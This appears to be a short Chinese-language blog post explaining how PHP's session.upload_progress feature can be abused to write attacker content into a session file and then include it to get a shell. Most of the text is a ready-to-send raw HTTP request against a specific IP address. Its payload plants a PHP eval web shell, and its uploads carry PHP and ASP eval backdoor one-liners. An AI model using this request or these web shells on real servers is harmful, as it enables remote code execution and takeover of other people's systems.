session.upload_progress.enabled
参数默认开启,需要手动关闭。
如果没有关闭的话,则会在上传文件的时候自动生成上传进度文件,其路径文件名可以在phpinfo中找到,格式如下:
/var/lib/php5/sess_{your_php_session_id}
这个时候只需要反复发送这么一个post包(from @berTrAM)
POST / HTTP/1.1
Host: 47.52.246.175:23333
Proxy-Connection: keep-alive
Content-Length: 648
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2rwkUEtFdqhGMHqV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5uu8r952rejihbg033m5mckb17
------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?=`echo '<?php eval($_REQUEST[bertram])?>'>bertram.php`?>
------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="file2"; filename="1.php"
Content-Type: text/php
<?php eval($_POST[1]);?>
------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="file1"; filename="2.asp"
Content-Type: application/octet-stream
< %eval request("a")%>
------WebKitFormBoundary2rwkUEtFdqhGMHqV
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundary2rwkUEtFdqhGMHqV--
则可以在
/var/lib/php5/sess_{your_php_session_id}
不断刷新恶意木马文件。
然后再去包含即可getshell
https://xz.aliyun.com/t/2148
https://php.net/manual/zh/session.upload-progress.php
网友评论